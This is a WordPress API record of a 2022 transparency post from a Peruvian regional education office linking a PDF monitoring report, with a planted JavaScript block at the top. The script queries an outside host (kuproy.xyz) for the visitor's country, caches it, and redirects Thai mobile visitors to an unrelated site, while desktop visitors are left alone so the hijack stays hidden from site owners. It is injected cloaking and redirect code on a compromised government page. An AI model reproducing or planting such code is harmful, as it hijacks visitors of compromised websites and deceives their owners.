<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":1962,"date":"2022-08-16T14:16:52","date_gmt":"2022-08-16T19:16:52","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=1962"},"modified":"2022-08-16T14:16:52","modified_gmt":"2022-08-16T19:16:52","slug":"reporte-de-seguimiento-del-plan-operativo-institucional","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/reporte-de-seguimiento-del-plan-operativo-institucional\/","title":{"rendered":"REPORTE DE SEGUIMIENTO DEL PLAN OPERATIVO INSTITUCIONAL"},"content":{"rendered":"\n<p>MEJORAR LA CALIDAD EDUCATIVA DE LOS ESTUDIANTES EN SUS DIFERENTES NIVELES<br>ACCESO A EDUCACI\u00d3N B\u00c1SICA Y EDUCACI\u00d3N SUPERIOR CON CONDICIONES B\u00c1SICAS DE CALIDAD PARA LOS NI\u00d1OS(AS), ADOLESCENTES, J\u00d3VENES Y ADULTOS<\/p>\n\n\n\n<div data-wp-interactive=\"core\/file\" class=\"wp-block-file\"><object data-wp-bind--hidden=\"!state.hasPdfPreview\" hidden class=\"wp-block-file__embed\" data=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2022\/08\/REPORTE-SEGUIMIENTO-POI-I-SEMESTRE-UGEL.AN1_.pdf\" type=\"application\/pdf\" style=\"width:100%;height:600px\" aria-label=\"Incrustado de Incrustado de REPORTE-SEGUIMIENTO-POI-I-SEMESTRE-UGEL.AN1_..\"><\/object><a id=\"wp-block-file--media-8b4affe4-d925-4997-b5f0-1d43bfb137ce\" href=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2022\/08\/REPORTE-SEGUIMIENTO-POI-I-SEMESTRE-UGEL.AN1_.pdf\">REPORTE-SEGUIMIENTO-POI-I-SEMESTRE-UGEL.AN1_<\/a><a href=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2022\/08\/REPORTE-SEGUIMIENTO-POI-I-SEMESTRE-UGEL.AN1_.pdf\" class=\"wp-block-file__button\" download aria-describedby=\"wp-block-file--media-8b4affe4-d925-4997-b5f0-1d43bfb137ce\">Descarga<\/a><\/div>\n","protected":false},"excerpt":{"rendered":"<p>MEJORAR LA CALIDAD EDUCATIVA DE LOS ESTUDIANTES EN SUS DIFERENTES NIVELESACCESO A EDUCACI\u00d3N B\u00c1SICA Y EDUCACI\u00d3N SUPERIOR CON CONDICIONES B\u00c1SICAS DE CALIDAD PARA LOS NI\u00d1OS(AS), ADOLESCENTES, J\u00d3VENES Y ADULTOS<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[15],"tags":[],"class_list":["post-1962","post","type-post","status-publish","format-standard","hentry","category-transparencia"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/1962","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=1962"}],"version-history":[{"count":1,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/1962\/revisions"}],"predecessor-version":[{"id":1964,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/1962\/revisions\/1964"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=1962"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=1962"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=1962"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}